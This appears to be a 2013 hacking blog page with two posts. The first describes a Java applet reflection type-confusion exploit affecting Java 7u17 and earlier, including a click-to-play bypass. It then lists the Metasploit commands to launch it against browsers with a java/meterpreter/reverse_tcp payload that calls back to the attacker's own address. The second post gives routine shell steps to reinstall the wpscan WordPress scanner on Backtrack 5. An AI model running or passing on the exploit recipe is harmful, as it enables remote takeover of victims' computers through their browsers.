Why don't you help Animal?

Tuesday, April 30, 2013

Java Applet Reflection Type Confusion Remote Code Execution

Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)


(2)msf > use exploit/multi/browser/java_jre17_reflection_types

(3)msf exploit(java_jre17_reflection_types) > show payloads

(4)msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp

(5)msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]

(6)msf exploit(java_jre17_reflection_types) > exploit

Monday, April 15, 2013

How to Solve problem of wpscan in Backtrack 5 r3?

Wpscan is wordpress security scanner, which is pre-installed in backtrack 5 , but it`s outdated version, so when you tried to update it, you may  have face some problems. Here is solution which work for me.

cd /pentest/web
rm -rf wpscan
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
gem install bundler && bundle install --without test development
apt-get install libxml2 libxml2-dev libxslt1-dev
gem install  bundler
bundle install
ruby ./wpscan.rb